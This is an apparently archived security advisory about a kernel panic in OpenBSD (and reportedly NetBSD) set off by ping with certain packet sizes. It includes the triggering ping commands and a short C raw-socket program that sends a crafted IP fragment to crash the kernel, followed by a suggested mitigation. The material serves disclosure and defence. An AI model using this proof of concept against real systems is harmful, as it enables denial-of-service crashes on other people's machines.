COMMAND
	    ping
SYSTEMS AFFECTED
	    OpenBSD
PROBLEM
	    Ficus carica found following on his OpenBSD.current PPP system:
	
	        ping -s2955 1.2.3.4
	
	    or
	
	        ping -s1455 1.2.3.4
	
	    causes kernel panic
	    Thankfully this bug  does NOT appear  to be remotely  exploitable.
	    There is second hand  confirmation that this problem  exists under
	    netbsd as  well.   Note that  it seems  in order  for the previous
	    commands  to  cause  reboot,  the  system  must NOT have a default
	    route.  This could tend to reduce the impact of the bug.
	    Note also that  this bug don't  work for big  number of cases  and
	    it's only bug.  Anyway, code follows:
	
	    /* 1-3 bytes of fragment data will cause panic.                 */
	    /* ping -pff -s2955 to some interface with an MTU of 1500 bytes */
	    /* will recreate this packet, so it's clearly legal.            */
	    /* If it doesn't work, mail me for the original program.        */
	    /* Ficus carica <[email protected]>                   */
	    #include <sys/types.h>
	    #include <sys/socket.h>
	    #include <netinet/in.h>
	    char buf[] = "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6"
	                 "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF";
	    /* will not panic with more than three bytes    ^^  ^^  ^^      */
	    main() {
	            struct sockaddr_in thesocket;
	            int sockd, on = 1;
	            thesocket.sin_family = AF_INET;
	            thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");
	            sockd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
	            setsockopt(sockd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on));
	            sendto(sockd, buf, sizeof(buf)-1, 0x0,
	                    (struct sockaddr *)&thesocket, sizeof(thesocket));
	            close(sockd); /* buf - 1 because of null terminator */
	    }
	
SOLUTION
	    Fix should be read as:
	
	        1: chmod a-s /usr/sbin/traceroute /sbin/ping
	        2: avoid goofing around with home made packet fraggers